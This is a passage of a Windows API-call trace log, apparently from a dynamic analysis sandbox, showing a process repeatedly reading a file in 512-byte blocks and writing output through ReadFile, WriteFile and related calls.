lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.281] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.281] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.281] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.281] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.281] GetFileType (hFile=0x50) returned 0x1 [0127.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.281] GetFileType (hFile=0x50) returned 0x1 [0127.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.281] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.281] GetFileType (hFile=0x50) returned 0x1 [0127.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.281] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.281] GetFileType (hFile=0x50) returned 0x1 [0127.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.281] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.281] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0127.281] GetFileType (hFile=0x50) returned 0x1 [0127.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.281] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.281] GetFileType (hFile=0x50) returned 0x1 [0127.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.281] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.281] GetFileType (hFile=0x50) returned 0x1 [0127.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.281] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.282] GetFileType (hFile=0x50) returned 0x1 [0127.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.282] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.282] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.282] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.282] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.282] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, 
lpOverlapped=0x0) returned 1 [0127.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.282] GetFileType (hFile=0x50) returned 0x1 [0127.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.282] GetFileType (hFile=0x50) returned 0x1 [0127.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.282] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.282] GetFileType (hFile=0x50) returned 0x1 [0127.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.282] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.282] GetFileType (hFile=0x50) returned 0x1 [0127.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.282] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.282] GetFileType (hFile=0x50) returned 0x1 [0127.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.282] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.283] GetFileType (hFile=0x50) returned 0x1 [0127.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.283] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 
| out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.283] GetFileType (hFile=0x50) returned 0x1 [0127.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.283] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.283] GetFileType (hFile=0x50) returned 0x1 [0127.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.283] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.283] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.283] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.283] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.283] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.283] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.283] GetFileType (hFile=0x50) returned 0x1 [0127.283] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.283] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.284] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.284] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.284] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.284] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.284] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.284] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.284] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.284] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.284] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.284] ReadFile (in: hFile=0x58, 
lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.284] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.284] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.284] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.285] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.285] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.285] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.285] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.285] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.285] ReadFile 
(in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.285] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.285] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.285] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.285] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.286] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.286] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.286] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.286] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 
[0127.286] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.286] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.286] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.286] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.286] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.286] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.286] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.286] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.286] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, 
lpOverlapped=0x0) returned 1 [0127.287] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.287] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.287] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.287] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.287] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.287] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.287] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.287] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.287] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, 
lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.287] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.287] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.288] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.288] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.288] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.288] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.288] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.288] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.288] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: 
lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.288] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.288] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.288] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.288] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.288] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.288] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.289] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.289] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.289] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, 
lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.289] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.289] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.289] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.289] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.289] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, 